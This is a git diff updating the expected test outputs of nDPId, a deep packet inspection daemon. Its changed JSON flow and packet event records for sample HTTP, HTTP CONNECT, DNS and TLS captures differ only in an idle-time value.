+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":328,"packets-processed":328,"total-skipped-flows":0,"total-l4-data-len":941545,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":946729148160} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 328/328 diff --git a/test/results/http_auth.pcap.out b/test/results/http_auth.pcap.out index 52daa0f5d..c4889538f 100644 --- a/test/results/http_auth.pcap.out +++ b/test/results/http_auth.pcap.out 
@@ -1,11 +1,11 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http_auth.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1381844050222} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1381844050222,"flow_last_seen":1381844050222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1381844050222,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1381844050222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1381844050222,"pkt":"TBfruiThKM\/pITwrCABFAABARSdAAEAGtjzAqAAEwP69qdRBAFCa4jGyAAAAALAC\/\/8jTAAAAgQFtAEDAwQBAQgKH38TuAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1381844050402,"pkt":"KM\/pITwrTBfruiThCABFAAA8AABAADgGA2jA\/r2pwKgABABQ1EEDZtH9muIxs6ASOJA\/hAAAAgQFtAQCCAowzbX3H38TuAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1381844050402,"pkt":"TBfruiThKM\/pITwrCABFAAA0XSJAAEAGnk3AqAAEwP69qdRBAFCa4jGzA2bR\/oAQICuGBAAAAQEICh9\/FGkwzbX3"} 
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1381844050222,"flow_last_seen":1381844050222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1381844050222,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1381844050222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1381844050222,"pkt":"TBfruiThKM\/pITwrCABFAABARSdAAEAGtjzAqAAEwP69qdRBAFCa4jGyAAAAALAC\/\/8jTAAAAgQFtAEDAwQBAQgKH38TuAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1381844050402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1381844050402,"pkt":"KM\/pITwrTBfruiThCABFAAA8AABAADgGA2jA\/r2pwKgABABQ1EEDZtH9muIxs6ASOJA\/hAAAAgQFtAQCCAowzbX3H38TuAEDAwc="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1381844050402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1381844050402,"pkt":"TBfruiThKM\/pITwrCABFAAA0XSJAAEAGnk3AqAAEwP69qdRBAFCa4jGzA2bR\/oAQICuGBAAAAQEICh9\/FGkwzbX3"} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-data-len":18376,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1381844057320} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 33/33 diff --git a/test/results/http_connect.pcap.out b/test/results/http_connect.pcap.out index 6d7aad09a..c18b1d5b8 100644 --- a/test/results/http_connect.pcap.out +++ b/test/results/http_connect.pcap.out 
@@ -1,24 +1,24 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http_connect.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1631454722864} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722864,"flow_last_seen":1631454722864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722864,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1631454722864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"AAwpTU5kKBaoBOm8CABFAAA0iNFAAIAG7ajAqAFnwKgBkgayH5A7mDABAAAAAIAC+vBd+gAAAgQFtAEDAwgBAQQC"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1631454722864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"KBaoBOm8AAwpTU5kCABFAAA0AABAAEAGtnrAqAGSwKgBZx+QBrLnDc0lO5gwAoAS+vCEcAAAAgQFtAEBBAIBAwMH"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1631454722866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1631454722866,"pkt":"AAwpTU5kKBaoBOm8CABFAAAoiNJAAIAG7bPAqAFnwKgBkgayH5A7mDAC5w3NJlAQBALhdwAAAAAAAAAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722864,"flow_last_seen":1631454722864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722864,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1631454722864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"AAwpTU5kKBaoBOm8CABFAAA0iNFAAIAG7ajAqAFnwKgBkgayH5A7mDABAAAAAIAC+vBd+gAAAgQFtAEDAwgBAQQC"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1631454722864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"KBaoBOm8AAwpTU5kCABFAAA0AABAAEAGtnrAqAGSwKgBZx+QBrLnDc0lO5gwAoAS+vCEcAAAAgQFtAEBBAIBAwMH"} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1631454722866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1631454722866,"pkt":"AAwpTU5kKBaoBOm8CABFAAAoiNJAAIAG7bPAqAFnwKgBkgayH5A7mDAC5w3NJlAQBALhdwAAAAAAAAAA"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1631454722867,"pkt":"AAwpGN5XAAwpTU5kCABFAABDZMpAAEARUfvAqAGSwKgBArqXADUAL4Ql9bcBAAABAAAAAAABBmFwYWNoZQNvcmcAAAEAAQAAKQIAAAAAAAAA"} 00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1631454722867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1631454722867,"pkt":"AAwpTU5kAAwpGN5XCABFAABTqZtAAEARDRrAqAECwKgBkgA1upcAP92U9beBgAABAAEAAAABBmFwYWNoZQNvcmcAAAEAAcAMAAEAAQAAA0oABJdlAoQAACkE0AAAAAAAAA=="} 
00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.2.132"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722867,"pkt":"ACWQX+cTAAwpTU5kCABFAAA8Fy1AAEAGx2vAqAGSl2UChIyAAbsTD57aAAAAAKAC+vBcUgAAAgQFtAQCCAoKBFeEAAAAAAEDAwc="} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1631454722876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722876,"pkt":"AAwpTU5kACWQX+cTCABFAAA8AABAADwG4piXZQKEwKgBkgG7jICt6jOtEw+e26AS\/\/+T8gAAAgQFdAQCCAosPaiUCgRXhAEDAwk="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1631454722876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722876,"pkt":"ACWQX+cTAAwpTU5kCABFAAA0Fy5AAEAGx3LAqAGSl2UChIyAAbsTD57breozroAQAfZcSgAAAQEICgoEV40sPaiU"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722867,"pkt":"ACWQX+cTAAwpTU5kCABFAAA8Fy1AAEAGx2vAqAGSl2UChIyAAbsTD57aAAAAAKAC+vBcUgAAAgQFtAQCCAoKBFeEAAAAAAEDAwc="} 
